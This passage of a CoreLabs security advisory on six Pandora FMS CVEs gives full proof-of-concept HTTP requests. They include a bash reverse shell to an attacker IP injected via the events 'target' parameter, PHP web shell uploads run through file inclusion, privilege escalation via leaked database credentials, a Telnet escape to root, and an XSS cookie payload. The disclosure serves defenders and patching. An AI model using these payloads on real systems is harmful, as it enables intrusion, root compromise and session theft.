The `Events` function allows a user to configure and execute actions (server responses) based on specific conditions reported by the agents. For instance, it is possible to leverage the mentioned feature to execute an arbitrary operating system command as the user `apache` in the context of the Pandora FMS server. It should be noted that low privilege (i.e. non-administrative users) can issue the following request as well.\n\nThe following proof of concept shows how it is possible to obtain a reverse shell by tampering the `target` parameter:\n \n \n POST /pandora_console/ajax.php HTTP/1.1\n Host: 192.168.1.20\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: text/html, */*; q=0.01\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n Content-Length: 124\n Origin: http://192.168.1.20\n Connection: close\n Referer: http://192.168.1.20/pandora_console/index.php?sec=eventos&sec2=operation/events/events\n Cookie: PHPSESSID=lo4k64pfhme12ic7reau9t5dqh\n \n page=include/ajax/events&perform_event_response=10000000\n &**target=bash -i >%26 /dev/tcp/192.168.1.17/1337 0>%261**&response_id=1\n \n\nAfter sending the request, a reverse connection on the attack server is received:\n \n \n [email\u00a0protected]:~# nc -vlp 1337\n Listening on [0.0.0.0] (family 0, port 1337)\n **Connection from 192.168.1.20 51010 received!\n bash: no job control in this shell\n bash-4.2$ whoami\n apache**\n \n\nAdditionally, in a default installation, the application reads MySQL database credentials from the plaintext `/var/www/html/pandora_console/include/config.php` file. It is possible for an attacker to gain remote command execution with the apache system user in the underlying server. This could be done, for instance, by exploiting this vulnerability or any other explained in the following sections involving remote code execution. 
Once this is achieved, they could then attempt to connect to the Pandora database. From there, they could, for example, elevate the privileges of the compromised Pandora Console user account to those of an administrator.\n\n_Note: We observed that the database credentials differ between the Docker container and the CentOS ISO appliance, said values being _`avwwoyqk`_ and _`pandora`_, respectively._\n\nThe following proof of concept shows an attacker reading the plaintext value of the database password and then connecting to the server to escalate the privileges of the compromised low-privilege console user to those of an administrator:\n \n \n **1. Reading from the config.php file**\n \n bash-4.1$ cd include\n cd include\n bash-4.1$ cat config.php | grep dbpass\n cat config.php | grep dbpass\n \t\t**$config[\"dbpass\"]=\"avwwoyqk\";**\t// DB Password\n // $config[\"dbpass\"]=\"pandora\";\n \n **2. Querying the database**\n \n mysql> select is_admin from tusuario where id_user = \"test\";\n +----------+\n | is_admin |\n +----------+\n | 0 |\n +----------+\n 1 row in set (0.00 sec)\n \n **3. Assigning admin permissions to the compromised user**\n \n mysql> update tusuario set is_admin = 1 where id_user = \"test\";\n Query OK, 1 row affected (0.01 sec)\n Rows matched: 1 Changed: 1 Warnings: 0\n \n mysql> select is_admin from tusuario where id_user = \"test\";\n +----------+\n | is_admin |\n +----------+\n | 1 |\n +----------+\n 1 row in set (0.00 sec)\n \n\n### 7.2. Arbitrary File Upload Via the File Manager Feature Leading to Remote Command Execution\n\n[[CVE-2020-13852](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13852>)] Pandora FMS provides a `File Manager` feature accessible by users with administrative privileges. 
It is possible to abuse this functionality to upload a file containing a PHP web shell to a restricted folder which may lead to the execution of commands with the privileges of the `apache` user.\n\nThe following proof of concept demonstrates the vulnerability:\n\nLogged in as an administrator, it is possible to leverage the `File Manager` feature to upload a PHP file. Executing this PHP file would lead to the execution of any system command provided to the page via the HTTP POST `cmd` parameter. The code of the web shell is shown below:\n \n \n <?php\n $output = shell_exec($_POST['cmd']);\n echo \"<pre>$output</pre>\"; \n ?> \n **[Request]**\n POST /pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager \n HTTP/1.1\n Host: 192.168.1.20\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Content-Type: multipart/form-data; boundary=---------------------------19068623751021147411178271167\n Content-Length: 1336\n Origin: http://192.168.1.20\n Connection: close\n Referer: http://192.168.1.20/pandora_console/index.php?sec=gextensions&sec2=godmode/setup/file_manager\n Cookie: PHPSESSID=gop2lt4002uc2afj9p66jou1d0\n Upgrade-Insecure-Requests: 1\n \n -----------------------------19068623751021147411178271167\n **Content-Disposition: form-data; name=\"file\"; filename=\"web_shell.php\"\n Content-Type: application/x-php\n \n <?php \n $output = shell_exec($_POST['cmd']); \n echo \"<pre>$output</pre>\"; \n ?>**\n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"umask\"\n \n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"decompress_sent\"\n 1\n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"go\"\n Go\n 
-----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"real_directory\"\n /var/www/html/pandora_console/images\n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"directory\"\n images\n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"hash\"\n 8ab9a12b08e95f7d1a23cfaaf198ed04\n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"hash2\"\n 3976ae502982bca85302c6766fc340ec\n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"upload_file_or_zip\"\n 1\n -----------------------------19068623751021147411178271167--\n \n **[Response]**\n HTTP/1.1 200 OK\n Date: Mon, 09 Mar 2020 19:12:25 GMT\n Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.16\n X-Powered-By: PHP/7.2.16\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=gop2lt4002uc2afj9p66jou1d0; expires=Mon, 09-Mar-2020 20:42:25 GMT; Max-Age=5400; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Connection: close\n Content-Type: text/html; charset=UTF-8\n Content-Length: 1406328\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n \n <title>Pandora FMS - the Flexible Monitoring System</title>\n <meta http-equiv=\"expires\" content=\"never\" />\n <meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\" />\n <meta http-equiv=\"Content-Style-Type\" content=\"text/css\" />\n <meta name=\"resource-type\" content=\"document\" />\n [...]\n \n\nIt is possible to leverage the `ajax.php` script to execute the 
previously uploaded web shell, as this script has a `Local File Inclusion` vulnerability. It was observed that this script passes the content of the POST `page` parameter as the argument of an `include_once()` function. The validation performed on the `page` value before it is passed to the inclusion function proved to be insufficient, as it only prevented loading remotely hosted scripts but allowed loading any PHP file previously uploaded to the local file system. Finally, it should be noted that `ajax.php` is accessible by non-administrative users as well.\n\nThe following example demonstrates the execution of the `whoami` and `ls` commands:\n \n \n **[Request]**\n POST /pandora_console/ajax.php HTTP/1.1\n Host: 192.168.1.20\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: application/json, text/javascript, */*; q=0.01\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n Content-Length: 67\n Origin: http://192.168.1.20\n Connection: close\n Referer: http://192.168.1.20/pandora_console/index.php?sec=godmode/extensions&sec2=extensions/files_repo\n Cookie: PHPSESSID=gop2lt4002uc2afj9p66jou1d0\n \n **page=/var/www/html/pandora_console/images/web_shell&cmd=whoami%26ls**\n \n **[Response]**\n HTTP/1.1 200 OK\n Date: Mon, 09 Mar 2020 19:22:06 GMT\n Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.16\n X-Powered-By: PHP/7.2.16\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=gop2lt4002uc2afj9p66jou1d0; expires=Mon, 09-Mar-2020 20:52:06 GMT; Max-Age=5400; path=/\n Content-Length: 474\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n <pre>apache\n AUTHORS\n COPYING\n DB_Dockerfile\n DEBIAN\n Dockerfile\n ajax.php\n attachment\n audit.log\n composer.json\n composer.lock\n docker_entrypoint.sh\n extensions\n 
extras\n fonts\n general\n godmode\n images\n include\n index.php\n install.done\n mobile\n operation\n pandora_console.log\n pandora_console_logrotate_centos\n pandora_console_logrotate_suse\n pandora_console_logrotate_ubuntu\n pandora_console_upgrade\n pandora_websocket_engine.service\n pandoradb.sql\n pandoradb_data.sql\n tests\n tools\n vendor\n ws.php\n </pre>\n \n\n### 7.3. Arbitrary File Upload Via the File Repository Manager Feature Leading to Remote Command Execution\n\n[[CVE-2020-13855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13855>)] Pandora FMS provides an administrative user with the `File Repository` feature. This feature is different from the `File Manager` function affected by vulnerability 7.2. It is possible to abuse this functionality to upload a file containing a PHP web shell to a publicly accessible folder, which could lead to the execution of system commands with the privileges of the `apache` user.\n\nThe following proof of concept demonstrates the vulnerability:\n\nLogged in as an administrator, it is possible to leverage the `File Manager` feature to upload a PHP file. Executing this PHP file would lead to the execution of any system command provided to the page via the HTTP POST `cmd` parameter. 
This code of the web shell is shown below:\n \n \n <?php\n $output = shell_exec($_POST ['cmd'];\n echo \"<pre>$output</pre>\";\n ?>\n **\n [Request]**\n POST /pandora_console/index.php?sec=godmode/extensions&sec2=extensions/files_repo HTTP/1.1\n Host: 192.168.1.20\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Content-Type: multipart/form-data; boundary=---------------------------70052089918250578231458401616\n Content-Length: 771\n Origin: http://192.168.1.20\n Connection: close\n Referer: http://192.168.1.20/pandora_console/index.php?sec=godmode/extensions&sec2=extensions/files_repo\n Cookie: PHPSESSID=gop2lt4002uc2afj9p66jou1d0\n Upgrade-Insecure-Requests: 1\n \n -----------------------------70052089918250578231458401616\n **Content-Disposition: form-data; name=\"description\"\n \n \n -----------------------------70052089918250578231458401616\n Content-Disposition: form-data; name=\"upfile\"; filename=\"core.php\n Content-Type: application/x-php\n \n <?php \n \n $output = shell_exec($_GET['cmd']); \n \n echo \"<pre>$output</pre>\"; \n ?>**\n -----------------------------70052089918250578231458401616\n Content-Disposition: form-data; name=\"public_sent\"\n \n 1\n -----------------------------70052089918250578231458401616\n Content-Disposition: form-data; name=\"submit\"\n \n Add\n -----------------------------70052089918250578231458401616\n Content-Disposition: form-data; name=\"add_file\"\n \n 1\n -----------------------------70052089918250578231458401616--\n **\n [Response]**\n HTTP/1.1 200 OK\n Date: Mon, 09 Mar 2020 19:29:12 GMT\n Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.16\n X-Powered-By: PHP/7.2.16\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: 
PHPSESSID=gop2lt4002uc2afj9p66jou1d0; expires=Mon, 09-Mar-2020 20:59:12 GMT; Max-Age=5400; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Connection: close\n Content-Type: text/html; charset=UTF-8\n Content-Length: 83935\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \n \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n \n <title>Pandora FMS - the Flexible Monitoring System</title>\n <meta http-equiv=\"expires\" content=\"never\" />\n <meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\" />\n <meta http-equiv=\"Content-Style-Type\" content=\"text/css\" />\n <meta name=\"resource-type\" content=\"document\" />\n <meta name=\"distribution\" content=\"global\" />\n <meta name=\"author\" content=\"\u00c1rtica ST\" />\n [...]\n </script><div class='pagination ' ><div class=\"total_pages\">Total \n items: 3</div></div><table style=\"width:100%; \" cellpadding=\"4\" \n cellspacing=\"4\" border=\"0\" class=\"info_table\" \n id=\"table2\"><thead><tr><th class=\"header c0\" \n scope=\"col\">Name</th><th class=\"header c1\" \n scope=\"col\">Description</th><th class=\"header c2\" \n scope=\"col\">Size</th><th class=\"header c3\" scope=\"col\">Last \n modification</th><th class=\"header c4\" \n scope=\"col\"></th></tr></thead>\n <tbody>\n <tr id=\"table2-0\" style=\"\" class=\"datos2\">\n <td id=\"table2-0-0\" style=\"\" class=\"datos2 \"><a \n href=\"http://192.168.1.20/pandora_console/include/get_file.php?file=M193ZWJfc2hlbGwuc\n Ghw&hash=50be35ccbab054c01ec1a555be30839e\" \n target=\"_blank\">web_shell.php</a></td>\n <td id=\"table2-0-1\" style=\" max-width: 200px;;\" class=\"datos2 \"></td>\n <td id=\"table2-0-2\" style=\"\" class=\"datos2 \">84 B</td>\n <td id=\"table2-0-3\" style=\"\" class=\"datos2 \">March 9, 2020, 4:29 \n 
pm</td>\n [...]\n \n\nIt is possible to directly execute the PHP file by browsing to the URL `http://<pandora_console_ip>/pandora_console/attachment/files_repo/2_core.php?cmd=<command_to_execute>`. Authentication is not required to browse this web location.\n\nThe following example demonstrates the execution of `whoami` and `ls` commands:\n \n \n **[Request]**\n GET /pandora_console/attachment/files_repo/**2_core.php?cmd=whoami;ls **HTTP/1.1\n Host: 192.168.1.20\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n \n **[Response]**\n HTTP/1.1 200 OK\n Date: Mon, 09 Mar 2020 19:37:14 GMT\n Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.16\n X-Powered-By: PHP/7.2.16\n Content-Length: 77\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n <pre>apache\n 1_coresec.html\n 2_core.php\n 3_web_shell.php\n 4_web_shell.php\n </pre>\n \n\n### 7.4. Privilege Escalation\n\n[[CVE-2020-13854](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13854>)] Pandora FMS has a plugin named `Quick Shell` installed by default. This plugin is a Pandora FMS console extension that allows someone to connect any agent to a configured IP through SSH or Telnet. The Pandora FMS backend server uses `Gotty` in order to provide this functionality. As would be expected, `Gotty` service runs with root privileges:\n\nThe vulnerability resides in the Telnet client. In order to reproduce this, the following steps must be taken:\n\n\n\n 1. The attacker has to open a non-privileged port with Netcat (which will run in the context of the apache user) using the remote shell obtained from any of the remote code execution vulnerabilities described in 7.1, 7.2 or 7.3.\n 2. 
Using the Telnet feature available through the `Quick Shell` plugin in the agent installed by default in the Virtual Appliance, it is possible to connect to the port exposed by Netcat. \n\n \n bash-4.2$ nc -lvp 20000\n nc -lvp 20000\n Ncat: Version 7.50 ( https://nmap.org/ncat )\n Ncat: Listening on :::20000\n Ncat: Listening on 0.0.0.0:20000**\n Ncat: Connection from 10.74.48.90.\n Ncat: Connection from 10.74.48.90:60618.**\n \n\n 3. After the connection is established, the Telnet client in the web console waits for input. Then, using the `^]` escape sequence, it is possible to go back to the Telnet prompt. Finally, with the command `!/bin/bash`, it is possible to escape from the Telnet client and execute commands in the context of `Gotty`, which runs by default with `root` privileges. The following screenshot shows the execution of the `id` and `whoami` commands:\n\n\n\n_NOTE: Occasionally, in order to exploit this vulnerability, it is necessary to establish the connection twice. This is because Gotty sometimes closes the connection with the Telnet client immediately, before it\u2019s possible to send the escape sequence._\n\n### 7.5 Inadequate Access Controls on a Web Folder\n\n[[CVE-2020-13850](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13850>)] It is possible to access various locations in the Pandora FMS Console web folder via direct browsing without being logged on. 
This could be leveraged by a malicious individual to disclose potentially sensitive information, such as logs and uploaded files.\n\nThe following URLs can be accessed without requiring previous authentication:\n\nLog files:\n\n * `http://<pandora_console_ip>/pandora_console/audit.log`\n * `http://<pandora_console_ip>/pandora_console/pandora_console.log`\n\nFiles repositories which are vulnerable to directory listing:\n\n * `http://<pandora_console_ip>/pandora_console/attachment/download/`\n * `http://<pandora_console_ip>/pandora_console/attachment/files_repo/`\n\n### 7.6 Persistent XSS in the Messages Feature\n\n[[CVE-2020-13853](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13853>)] We observed that it is possible for users to send messages between one another, including a chunk of arbitrary JavaScript code within the body. This chunk will then be executed in the context of the recipient\u2019s browser after opening the message for reading. In particular, this behavior can be leveraged by an attacker with access to a set of credentials for a low privilege user to target a logged-in administrator and attempt to steal his/her current session cookie.\n\nThe following proof of concept demonstrates this vulnerability:\n\nThe section below shows the injection of arbitrary JavaScript code through the message feature:\n \n \n **[Request]**\n POST /pandora_console/index.php?sec=message_list&sec2=operation/messages\n message_edit&new_msg=1 HTTP/1.1\n Host: 192.168.1.143\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 125\n Origin: http://192.168.1.143\n Connection: close\n Referer: http://192.168.1.143/pandora_console/index.php?sec=message_list&sec2=operation\n /messages/message_edit&new_msg=1\n Cookie: 
PHPSESSID=iuhhef8aikdbpkc2gunq6p52sg\n Upgrade-Insecure-Requests: 1\n \n dst_user=admin&dst_group**=&subject=Testing&message=%3Cscript%3Ealert%28document.cookie\n %29%3C%2Fscript%3E&**send_mes=Send+message\n **\n [Response]**\n HTTP/1.1 200 OK\n Date: Tue, 10 Mar 2020 18:18:42 GMT\n Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.16\n X-Powered-By: PHP/7.2.16\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=iuhhef8aikdbpkc2gunq6p52sg; expires=Tue, 10-Mar-2020 19:48:42 GMT; Max-Age=5400; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Connection: close\n Content-Type: text/html; charset=UTF-8\n Content-Length: 61719\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n \n \t<title>Pandora FMS - the Flexible Monitoring System</title>\n \t\t<meta http-equiv=\"expires\" content=\"never\" />\n \t\t<meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\" />\n \t\t<meta http-equiv=\"Content-Style-Type\" content=\"text/css\" />\n \t\t<meta name=\"resource-type\" content=\"document\" />\n \t\t<meta name=\"distribution\" content=\"global\" />\n \t\t<meta name=\"author\" content=\"\u00c1rtica ST\" />\n \t\t<meta name=\"copyright\" content=\"(c) \u00c1rtica ST\" />\n \t\t<meta name=\"robots\" content=\"index, follow\" /><link rel=\"icon\" \n href=\"images/pandora.ico\" type=\"image/ico\" />\t\n [truncated]\n \n\nThe following section shows the JavaScript payload being included within the HTML page generated when attempting to read the message as the recipient:\n \n \n **[Request]**\n GET /pandora_console/index.php?sec=message_list&sec2=operation/messages/message_edit&\n 
read_message=1&**id_message=17** HTTP/1.1\n Host: 192.168.1.143\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Referer: http://192.168.1.143/pandora_console/index.php?sec=message_list&sec2=operation\n /messages/message_list\n Cookie: PHPSESSID=p8n31qt30gpdm8enseqirtqbi3\n Upgrade-Insecure-Requests: 1\n **\n [Response]**\n HTTP/1.1 200 OK\n Date: Tue, 10 Mar 2020 18:21:04 GMT\n Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.16\n X-Powered-By: PHP/7.2.16\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=p8n31qt30gpdm8enseqirtqbi3; expires=Tue, 10-Mar-2020 19:51:04 \n GMT; Max-Age=5400; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Connection: close\n Content-Type: text/html; charset=UTF-8\n Content-Length: 77725\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \n \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n [...]\n </script>\n </div><button onclick=\"topFunction()\" id=\"top_btn\" title=\"Go to top\"></button><div \n id=\"main\"><div id=\"menu_tab_frame_view\" style=\"\"><div id=\"menu_tab_left\"><ul \n class=\"mn\"><li class=\"view\"><span>Messages</span></li></ul></div><div \n id=\"menu_tab\"><ul class=\"mn\"><li class=\"nomn tab_operation\"><a \n href=\"index.php?sec=message_list&sec2=operation/messages/message_list\"><img \n src=\"http://192.168.1.143/pandora_console/images/email_inbox.png\" data-\n title=\"Received messages\" data-use_title_for_force_title=\"1\" class=\"forced_title\" \n alt=\"Received messages\" 
/></a></li><li class=\"nomn tab_operation\"><a \n href=\"index.php?sec=message_list&sec2=operation/messages/message_list&show_sent=1\n \"><img src=\"http://192.168.1.143/pandora_console/images/email_outbox.png\" data-\n title=\"Sent messages\" data-use_title_for_force_title=\"1\" class=\"forced_title\" \n alt=\"Sent messages\" /></a></li><li class=\"nomn_high tab_operation\"><a \n href=\"index.php?sec=message_list&sec2=operation/messages/message_edit\"><img \n src=\"http://192.168.1.143/pandora_console/images/new_message.png\" data-title=\"Create \n message\" data-use_title_for_force_title=\"1\" class=\"forced_title\" alt=\"Create message\" \n /></a></li></ul></div></div><h1>Conversation with test</h1><h2>Subject: \n Testing</h2><div class=\"container\"> \n <p>**<script>alert(document.cookie)</script>**</p><span class=\"time-left\">March 10, 2020, \n 3:18 pm test</span></div><form id=\"delete_message\" method=\"post\" \n action=\"index.php?sec=message_list&sec2=operation/messages/message_list&show_sent\n =1&delete_message=1&id=17\"></form><form id=\"reply_message\" method=\"post\" \n action=\"index.php?sec=message_list&sec2=operation/messages/message_edit&new_msg=1\n &reply=1\"><input id=\"hidden-dst_user\" name=\"dst_user\" type=\"hidden\" value=\"test\" \n /><input id=\"hidden-subject\" name=\"subject\" type=\"hidden\" value=\"RE: Testing\" \n /><input id=\"hidden-message\" name=\"message\" type=\"hidden\" value=\"\n \n \n On March 10, 2020, 3:18 pm test wrote:\n \n **<script>alert(document.cookie)</script>\" **/>\n [truncated]\n \n\nThe following screenshot shows the JavaScript code being executed in the context of the recipient\u2019s browser:\n\n\n\n## 8\\. 
Report Timeline\n\n2020-04-08 - Contact with vendor made through feedback form.\n\n2020-04-08 - Response received from CEO requesting clarifications.\n\n2020-04-08 - Advisory draft sent to vendor.\n\n2020-04-13 - Response received from vendor acknowledging the vulnerabilities.\n\n2020-06-03 - Pandora FMS 746 version released by development team.\n\n2020-06-04 - CVE IDs requested and received from Mitre.\n\n2020-06-09 - Advisory published.\n\n## 9\\. References\n\n[1] <https://pandorafms.com>\n\n[2] <https://pandorafms.com/downloads/whats-new-745-EN.pdf>\n\n[3] <https://pandorafms.com/downloads/whats-new-746-EN.pdf>\n\n## 10\\. About CoreLabs\n\nCoreLabs, the research center of Core Security, a HelpSystems Company, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is composed of seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>. \n\n## 11\\. About Core Security, A HelpSystems Company\n\nCore Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. 
Learn more at [www.coresecurity.com](<https://www.coresecurity.com>).\n\nCore Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, [contact](<https://www.coresecurity.com/contact>) Core Security at (678) 304-4500 or [email protected]. \n\n## 12\\. Disclaimer\n\nThe contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "coresecurity", "title": "Pandora FMS Community Multiple Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13850", "CVE-2020-13851", "CVE-2020-13852", "CVE-2020-13853", "CVE-2020-13854", "CVE-2020-13855"], "modified": "2020-06-09T00:00:00", "id": "CORE-2020-0010", "href": "https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}